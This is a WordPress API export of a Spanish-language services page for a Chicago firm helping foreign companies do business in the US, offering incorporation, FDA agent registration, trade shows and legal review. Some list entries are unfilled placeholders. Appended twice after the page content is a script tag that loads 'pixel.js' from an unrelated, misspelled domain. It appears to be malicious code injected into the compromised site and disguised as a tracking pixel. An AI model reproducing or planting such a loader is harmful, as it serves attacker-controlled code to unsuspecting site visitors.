{"id":3134,"date":"2014-08-16T07:17:42","date_gmt":"2014-08-16T07:17:42","guid":{"rendered":"https:\/\/americanagent.com\/usa-business-support-services-2\/"},"modified":"2014-09-10T16:38:16","modified_gmt":"2014-09-10T20:38:16","slug":"los-servicios-de-asistencia-de-eeuu","status":"publish","type":"page","link":"https:\/\/americanagent.com\/es\/los-servicios-de-asistencia-de-eeuu\/","title":{"rendered":"Los servicios de asistencia de EEUU"},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-2b38a84892670fe8065e773ff823c53f\">\n#top .av-special-heading.av-av_heading-2b38a84892670fe8065e773ff823c53f{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-2b38a84892670fe8065e773ff823c53f .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-2b38a84892670fe8065e773ff823c53f .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-2b38a84892670fe8065e773ff823c53f av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >Hacer negocios en Estados Unidos<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-7f317741ca2418a36614f046e139f8be '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p>A menudo, hay algunos servicios importantes que se requieren para completar la soluci\u00f3n. La lista a continuaci\u00f3n refleja los servicios que se llevan a cabo por la red probada de los socios.<\/p>\n<p>Muchos de los socios han participado con los clientes. Al ya conocer el proceso y a las personas que la integran, el resultado es una soluci\u00f3n econ\u00f3mica y un proceso de comunicaci\u00f3n r\u00e1pida.<\/p>\n<p>La lista especificada a continuaci\u00f3n s\u00f3lo sirve como una presentaci\u00f3n de algunas de las cuestiones que somos capaces de organizar en su nombre aqu\u00ed en EE.UU..<\/p>\n<\/div><\/section><br \/>\n<div  class='avia-icon-list-container av-av_iconlist-e4a0ebdf966f1bea8883e87bb95dffd6  avia-builder-el-3  el_after_av_textblock  avia-builder-el-last '><ul class='avia-icon-list avia_animate_when_almost_visible avia-icon-list-left av-iconlist-big av-av_iconlist-e4a0ebdf966f1bea8883e87bb95dffd6 avia-iconlist-animate'>\n<li><div class='iconlist_icon av-av_iconlist_item-73b432f205a5d462cbf050577890ceb2 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: La incorporaci\u00f3n en los EE.UU. (Inc. o LLC). \"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >La incorporaci\u00f3n en los EE.UU. (Inc. o LLC). <\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>List Content goes here<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-b228041bfe60a60aa8484f14180c73a3 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Asuntos bancarios locales - Facturaci\u00f3n, contabilidad y preparaci\u00f3n de impuestos por las empresas asociadas conocidas y de confianza de Chicago.\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Asuntos bancarios locales - Facturaci\u00f3n, contabilidad y preparaci\u00f3n de impuestos por las empresas asociadas conocidas y de confianza de Chicago.<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Invoicing, collecting, accounting and tax preparations by known and trustworthy Chicago partner companies.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-5b5fe5a0ecfb36990ed3817e25f5edf5 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon:  Oficina en Am\u00e9rica - Su propia direcci\u00f3n y n\u00famero de tel\u00e9fono con servicio de contestador, muy bueno para la atenci\u00f3n al cliente local y demostrando presencia local en EE.UU..\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" > Oficina en Am\u00e9rica - Su propia direcci\u00f3n y n\u00famero de tel\u00e9fono con servicio de contestador, muy bueno para la atenci\u00f3n al cliente local y demostrando presencia local en EE.UU..<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Your own dedicated address and telephone number with answering service, very good for local customer support and displaying local USA presence.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-87a44d1a8fcc5f9ec043d9cfb5f56acf avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Dep\u00f3sito y almacenamiento de productos (calientes o congelados), log\u00edstica de productos, distribuci\u00f3n del producto a nivel nacional.\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Dep\u00f3sito y almacenamiento de productos (calientes o congelados), log\u00edstica de productos, distribuci\u00f3n del producto a nivel nacional.<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Product logistics, nationwide product distribution.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-7d000be0e9f8160ca3322f731e680e99 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Garant\u00eda y programas de devoluci\u00f3n del producto.\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Garant\u00eda y programas de devoluci\u00f3n del producto.<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>List Content goes here<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-c27475002fabc9be9e9fc13d8b8a7ff8 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Registros FDA - American Agent es nombrado como &quot;agente local&quot; en la FDA (Food and Drug Administration de EE.UU.)(Administraci\u00f3n de Alimentos y medicamentos en EE.UU.).\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Registros FDA - American Agent es nombrado como \"agente local\" en la FDA (Food and Drug Administration de EE.UU.)(Administraci\u00f3n de Alimentos y medicamentos en EE.UU.).<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>American Agent is already name as \u201clocal agent\u201d with the FDA (U.S. Food and Drug Administration)<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-e6c9f41f45ff1dce29140ec222171ee8 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Ferias - Aplicaciones, marketing pre-feria, organizaci\u00f3n del equipo necesario, env\u00edos, traductores similt\u00e1neos, personal extra para cubrir puestos si es necesario. \"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Ferias - Aplicaciones, marketing pre-feria, organizaci\u00f3n del equipo necesario, env\u00edos, traductores similt\u00e1neos, personal extra para cubrir puestos si es necesario. <\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Applications, pre-tradeshow marketing, organize necessary gear, shipping, show time translators, find extra personnel to cover the floor if necessary.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-59667212cdb784016b410565fcc551b9 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Todo tipo actividad en marketing - sitios web locales, traducciones, folletos, cat\u00e1logos, impresi\u00f3n local, organizar env\u00edos por correo ...\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Todo tipo actividad en marketing - sitios web locales, traducciones, folletos, cat\u00e1logos, impresi\u00f3n local, organizar env\u00edos por correo ...<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Local websites, translations, brochures, catalogs, local printing, organized mail outs \u2026<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-3164e206f02ecbf4d09e0aead6724259 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Un abogado local en EE.UU. para la supervisi\u00f3n de los contratos con los distribuidores y representantes \/ clientes \/ socios. Cualquier otra situaci\u00f3n que requiera la revisi\u00f3n de la atenci\u00f3n jur\u00eddica.\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Un abogado local en EE.UU. para la supervisi\u00f3n de los contratos con los distribuidores y representantes \/ clientes \/ socios. Cualquier otra situaci\u00f3n que requiera la revisi\u00f3n de la atenci\u00f3n jur\u00eddica.<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>For overseeing any contracts with Distributors \/ Representatives \/ Customers \/ Partners. Any other situation requiring review of legal attention.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-fb01abeba7bab98169df52a54a1dd537 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Colectar cuentas vencidas. Verificaci\u00f3n de antecedentes de potenciales socios.\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Colectar cuentas vencidas. Verificaci\u00f3n de antecedentes de potenciales socios.<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Background checks of potential partners<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<\/ul><\/div><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":4,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3134","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Los Servicios de asistencia - American Agent LLC Chicago<\/title>\n<meta name=\"description\" content=\"La incorporaci\u00f3n en los EEUU - Registros FDA - Para la supervisi\u00f3n de los contratos con los distribuidores y representantes \/ clientes \/ socios - Ferias\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/es\/los-servicios-de-asistencia-de-eeuu\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Los Servicios de asistencia - American Agent LLC Chicago\" \/>\n<meta property=\"og:description\" content=\"La incorporaci\u00f3n en los EEUU - Registros FDA - Para la supervisi\u00f3n de los contratos con los distribuidores y representantes \/ clientes \/ socios - Ferias\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/es\/los-servicios-de-asistencia-de-eeuu\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-10T20:38:16+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/los-servicios-de-asistencia-de-eeuu\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/es\\\/los-servicios-de-asistencia-de-eeuu\\\/\",\"name\":\"Los Servicios de asistencia - American Agent LLC Chicago\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/#website\"},\"datePublished\":\"2014-08-16T07:17:42+00:00\",\"dateModified\":\"2014-09-10T20:38:16+00:00\",\"description\":\"La incorporaci\u00f3n en los EEUU - Registros FDA - Para la supervisi\u00f3n de los contratos con los distribuidores y representantes \\\/ clientes \\\/ socios - Ferias\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/los-servicios-de-asistencia-de-eeuu\\\/#breadcrumb\"},\"inLanguage\":\"es-ES\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/es\\\/los-servicios-de-asistencia-de-eeuu\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/los-servicios-de-asistencia-de-eeuu\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/es\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Los servicios de asistencia de EEUU\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/es\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/es\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es-ES\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Los Servicios de asistencia - American Agent LLC Chicago","description":"La incorporaci\u00f3n en los EEUU - Registros FDA - Para la supervisi\u00f3n de los contratos con los distribuidores y representantes \/ clientes \/ socios - Ferias","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/es\/los-servicios-de-asistencia-de-eeuu\/","og_locale":"es_ES","og_type":"article","og_title":"Los Servicios de asistencia - American Agent LLC Chicago","og_description":"La incorporaci\u00f3n en los EEUU - Registros FDA - Para la supervisi\u00f3n de los contratos con los distribuidores y representantes \/ clientes \/ socios - Ferias","og_url":"https:\/\/americanagent.com\/es\/los-servicios-de-asistencia-de-eeuu\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-10T20:38:16+00:00","twitter_misc":{"Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/es\/los-servicios-de-asistencia-de-eeuu\/","url":"https:\/\/americanagent.com\/es\/los-servicios-de-asistencia-de-eeuu\/","name":"Los Servicios de asistencia - American Agent LLC Chicago","isPartOf":{"@id":"https:\/\/americanagent.com\/es\/#website"},"datePublished":"2014-08-16T07:17:42+00:00","dateModified":"2014-09-10T20:38:16+00:00","description":"La incorporaci\u00f3n en los EEUU - Registros FDA - Para la supervisi\u00f3n de los contratos con los distribuidores y representantes \/ clientes \/ socios - Ferias","breadcrumb":{"@id":"https:\/\/americanagent.com\/es\/los-servicios-de-asistencia-de-eeuu\/#breadcrumb"},"inLanguage":"es-ES","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/es\/los-servicios-de-asistencia-de-eeuu\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/es\/los-servicios-de-asistencia-de-eeuu\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/es\/"},{"@type":"ListItem","position":2,"name":"Los servicios de asistencia de EEUU"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/es\/#website","url":"https:\/\/americanagent.com\/es\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/es\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es-ES"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/pages\/3134","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/comments?post=3134"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/pages\/3134\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/media?parent=3134"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}